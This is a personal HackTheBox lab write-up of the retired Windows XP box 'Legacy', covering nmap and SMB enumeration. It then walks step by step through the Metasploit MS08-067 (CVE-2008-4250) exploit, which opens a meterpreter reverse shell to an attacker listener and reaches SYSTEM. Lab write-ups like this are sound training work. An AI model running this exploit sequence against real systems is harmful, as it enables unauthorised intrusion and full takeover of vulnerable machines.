HackTheBox: Legacy

01/13/2024

This is the second retired Windows box Ill be doing, after [[Blue]]. Im shamelessly following writeups and Guided mode just to get as much exposure as I can in as little time as possible, as a crash course of sorts. Once Im more comfortable with this OS ill do more boxes on my own.

Enumeration

Three ports open per nmap: 1) msrpc on 135 2) netbios-ssn on 139 3) microsoft-ds on 445

Script scan gives us a few pieces of useful information. Less significantly, the hostname is legacy.

More significantly, it reveals some juicy information about the SMB server on 139. First, the group name is HTB. Second, anonymous login is allowed.

Enumerating SMB (netbios-ssn)

Ill use smbclient to connect to the SMB server:

$ impacket-smbclient 10.10.10.4

# login
[*] USER Session Granted

# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

huh...

Im not spending a lot of time floundering around like a beached fish here. Im just going to use the writeup, since I know fuck all about Binbows BP

The writeup somehow deduced from the nmap scan that the box might be vulnerable to CVE-2008-4250, which has a metasploit module. This is a RCE vuln made possible by a buffer overflow in Windows RPC.

Exploiting CVE-2008-4250

msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4

msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.24
LHOST => 10.10.14.24

msf6 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 10.10.14.24:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.4:1035) at 2023-10-13 16:29:49 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM